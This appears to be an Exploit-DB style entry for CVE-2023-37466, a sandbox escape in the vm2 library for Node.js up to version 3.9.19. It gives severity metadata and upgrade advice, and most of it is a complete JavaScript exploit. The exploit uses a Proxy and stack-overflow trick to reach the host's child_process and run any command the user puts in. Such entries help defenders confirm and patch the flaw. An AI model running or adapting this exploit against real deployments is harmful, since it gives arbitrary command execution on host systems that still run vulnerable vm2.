vm2 Sandbox Escape Vulnerability

vendor:

vm2

by:

Calil Khalil & Adriel Mc Roberts

9.1

CVSS

CRITICAL

Sandbox Escape

862

CWE

Product Name: vm2

Affected Version From: <= 3.9.19

Affected Version To: 3.9.19

Patch Exists: YES

Related CWE: CVE-2023-37466

CPE: patriksimek:vm2

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 22.04

2023

vm2 Sandbox Escape Vulnerability

The vm2 library version <= 3.9.19 is vulnerable to a sandbox escape exploit. By executing specially crafted code, an attacker can escape the sandbox environment and execute arbitrary commands on the host system. This vulnerability has been assigned CVE-2023-37466.

Mitigation:

To mitigate this vulnerability, it is recommended to update the vm2 library to version 3.9.20 or higher. Additionally, avoid executing untrusted code within the sandbox environment.

Source

Exploit-DB raw data:

/*
# Exploit Title: vm2 Sandbox Escape vulnerability
# Date: 23/12/2023
# Exploit Author: Calil Khalil & Adriel Mc Roberts
# Vendor Homepage: https://github.com/patriksimek/vm2
# Software Link: https://github.com/patriksimek/vm2
# Version: vm2 <= 3.9.19
# Tested on: Ubuntu 22.04
# CVE : CVE-2023-37466
*/

const { VM } = require("vm2");
const vm = new VM();

const command = 'pwd'; // Change to the desired command

const code = `
async function fn() {
    (function stack() {
        new Error().stack;
        stack();
    })();
}

try {
    const handler = {
        getPrototypeOf(target) {
            (function stack() {
                new Error().stack;
                stack();
            })();
        }
    };

    const proxiedErr = new Proxy({}, handler);

    throw proxiedErr;
} catch ({ constructor: c }) {
    const childProcess = c.constructor('return process')().mainModule.require('child_process');
    childProcess.execSync('${command}');
}
`;

console.log(vm.run(code));